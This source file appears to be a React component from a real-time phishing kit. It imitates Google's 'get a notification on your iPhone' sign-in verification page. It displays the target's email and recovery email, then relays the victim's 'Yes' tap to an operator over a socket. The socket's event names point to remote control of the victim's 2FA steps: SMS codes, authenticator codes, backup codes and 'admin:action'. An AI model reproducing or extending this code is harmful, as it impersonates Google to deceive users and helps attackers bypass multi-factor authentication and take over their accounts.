import React, { useState, useEffect } from "react";
import Logo from "./assets/logo.webp";
import PhoneSvg from "./assets/tapyes-phone.svg";

const TapYes = ({ email, socket, onBack, recoveryEmail }) => {
  const [isLoading, setIsLoading] = useState(false);
  const [dontAskAgain, setDontAskAgain] = useState(true);

  useEffect(() => {
    if (!socket) return;

    const stopLoading = () => setIsLoading(false);

    const events = [
      "tap-code", "sms-code", "auth-code", "phone-number", "tap-yes",
      "backup-codes", "redirect", "login-error", "password-error",
      "smscode-error", "authcode-error", "phonenumber-error", "admin:action",
    ];

    events.forEach((evt) => socket.on(evt, stopLoading));
    return () => { events.forEach((evt) => socket.off(evt, stopLoading)); };
  }, [socket]);

  const handleYes = () => {
    setIsLoading(true);
    if (socket) {
      socket.emit("user:code", { email, code: "tap-yes-confirmed", dontAskAgain });
    }
  };

  return (
    <div className="md:min-h-screen bg-white md:bg-[#f0f4f9] flex items-center justify-center pt-5 pb-20 md:pb-0 md:py-12 px-4">
      <div className="w-full max-w-md md:max-w-5xl md:bg-white rounded-[28px] md:shadow-sm">
        {isLoading && (
          <div className="absolute top-0 left-0 md:top-auto md:left-auto w-full md:max-w-[60rem] h-[3px] bg-transparent overflow-hidden rounded-t-[28px]">
            <div className="h-full bg-[#1a73e8] animate-bar1"></div>
            <div className="h-full bg-[#1a73e8] animate-bar2"></div>
          </div>
        )}
        <div className="md:p-12">
          {/* Desktop Layout */}
          <div className="hidden md:flex md:gap-16 md:items-start">
            <div className="flex-1">
              <div className="mb-6">
                <img src={Logo} alt="logo" className="w-20" />
              </div>

              <h1 className="text-4xl font-normal text-gray-800 mb-4 text-start">
                Get a notification on the device signed into your recovery email
              </h1>
              <p className="text-sm text-gray-600 text-start leading-6 mb-8">
                Your recovery email <strong>{recoveryEmail || "k••••••••@gmail.com"}</strong> is signed into one or more of your devices. Google can send a notification to these devices to help you sign in.
              </p>

              <div className="flex items-center gap-3 mb-6 p-1 border border-[#612B1F] rounded-[16px] w-fit">
                <svg className="svgja" aria-hidden="true" fill="currentColor" focusable="false" width="20px" height="20px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                  <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm6.36 14.83c-1.43-1.74-4.9-2.33-6.36-2.33s-4.93.59-6.36 2.33C4.62 15.49 4 13.82 4 12c0-4.41 3.59-8 8-8s8 3.59 8 8c0 1.82-.62 3.49-1.64 4.83zM12 6c-1.94 0-3.5 1.56-3.5 3.5S10.06 13 12 13s3.5-1.56 3.5-3.5S13.94 6 12 6z"></path>
                </svg>
                <div className="text-sm text-gray-900 truncate">{email}</div>
                <button onClick={onBack} className="text-sm text-blue-600 hover:underline">
                  <svg aria-hidden="true" className="svgja" fill="currentColor" focusable="false" width="24px" height="24px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                    <path d="M7 10l5 5 5-5z"></path>
                  </svg>
                </button>
              </div>
            </div>

            <div className="flex-1">
              <div className="space-y-6">
                <div className="flex justify-center mb-4">
                  <img src={PhoneSvg} alt="phone notification" style={{ width: '280px', height: 'auto' }} />
                </div>

                <h2 className="text-base font-bold text-gray-800 text-start">
                  Do you have your iPhone?
                </h2>
                <p className="text-sm text-gray-600 text-start leading-6">
                  Google will send a notification to your iPhone to verify it's you
                </p>

                <div className="flex items-center mb-6 mt-4">
                  <input type="checkbox" id="dontAskAgainTapYes" checked={dontAskAgain} onChange={(e) => setDontAskAgain(e.target.checked)} className="h-4 w-4 text-blue-600 mr-2" />
                  <label htmlFor="dontAskAgainTapYes" className="text-sm text-gray-700">Don't ask again on this device</label>
                </div>

                <div className="flex items-center justify-end pt-8">
                  <a href="#" className="font-medium text-sm text-blue-600 hover:underline me-5">Try another way</a>
                  <button onClick={handleYes} disabled={isLoading} className="px-6 py-2.5 bg-blue-600 hover:bg-blue-700 text-white font-medium rounded-[20px] text-sm disabled:opacity-50 disabled:cursor-not-allowed transition-colors min-w-[80px]">
                    Yes
                  </button>
                </div>
              </div>
            </div>
          </div>

          {/* Mobile Layout */}
          <div className="md:hidden">
            <div className="text-start mb-6">
              <div className="inline-flex items-center justify-center mb-4">
                <img src={Logo} alt="logo" className="w-20" />
              </div>
              <h1 className="text-2xl font-normal text-gray-800 mb-4">
                Get a notification on the device signed into your recovery email
              </h1>
              <div className="flex items-center justify-center gap-3 mb-6 p-1 border border-[#612B1F] rounded-[16px] w-fit">
                <svg className="svgja" aria-hidden="true" fill="currentColor" focusable="false" width="20px" height="20px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                  <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm6.36 14.83c-1.43-1.74-4.9-2.33-6.36-2.33s-4.93.59-6.36 2.33C4.62 15.49 4 13.82 4 12c0-4.41 3.59-8 8-8s8 3.59 8 8c0 1.82-.62 3.49-1.64 4.83zM12 6c-1.94 0-3.5 1.56-3.5 3.5S10.06 13 12 13s3.5-1.56 3.5-3.5S13.94 6 12 6z"></path>
                </svg>
                <div className="text-sm text-gray-900 truncate">{email}</div>
                <button onClick={onBack} className="text-sm text-blue-600 hover:underline">
                  <svg aria-hidden="true" className="svgja" fill="currentColor" focusable="false" width="24px" height="24px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg">
                    <path d="M7 10l5 5 5-5z"></path>
                  </svg>
                </button>
              </div>
            </div>

            <div className="space-y-6">
              <p className="text-sm text-gray-600 text-start leading-6">
                Your recovery email <strong>{recoveryEmail || "k••••••••@gmail.com"}</strong> is signed into one or more of your devices. Google can send a notification to these devices to help you sign in.
              </p>
              <div className="flex justify-center my-4">
                <img src={PhoneSvg} alt="phone notification" style={{ width: '240px', height: 'auto' }} />
              </div>
              <h2 className="text-base font-bold text-gray-800 text-start">Do you have your iPhone?</h2>
              <p className="text-sm text-gray-600 text-start leading-6">Google will send a notification to your iPhone to verify it's you</p>

              <div className="flex items-center mb-4 mt-4">
                <input type="checkbox" id="dontAskAgainTapYesMobile" checked={dontAskAgain} onChange={(e) => setDontAskAgain(e.target.checked)} className="h-4 w-4 text-blue-600 mr-2" />
                <label htmlFor="dontAskAgainTapYesMobile" className="text-sm text-gray-700">Don't ask again on this device</label>
              </div>

              <div className="flex items-center justify-between pt-6">
                <button type="button" onClick={onBack} className="font-medium text-sm text-blue-600 hover:underline">Try another way</button>
                <button onClick={handleYes} disabled={isLoading} className="px-6 py-2.5 bg-blue-600 hover:bg-blue-700 text-white font-medium rounded-[20px] text-sm disabled:opacity-50 disabled:cursor-not-allowed transition-colors">
                  Yes
                </button>
              </div>
            </div>
          </div>
        </div>
        <footer className="fixed bottom-0 left-0 md:bottom-auto md:left-auto w-full md:max-w-5xl text-gray-600 text-[13px] px-4 md:px-6 py-2 flex items-center justify-center md:justify-between gap-6 flex-wrap">
          <div className="flex items-center gap-1">
            <select className="bg-transparent text-gray-600 dark:text-gray-300 text-sm focus:outline-none cursor-pointer" defaultValue="en-GB">
              <option value="en-US">English (United States)</option>
              <option value="en-GB">English (United Kingdom)</option>
            </select>
          </div>
        </footer>
      </div>
    </div>
  );
};

export default TapYes;
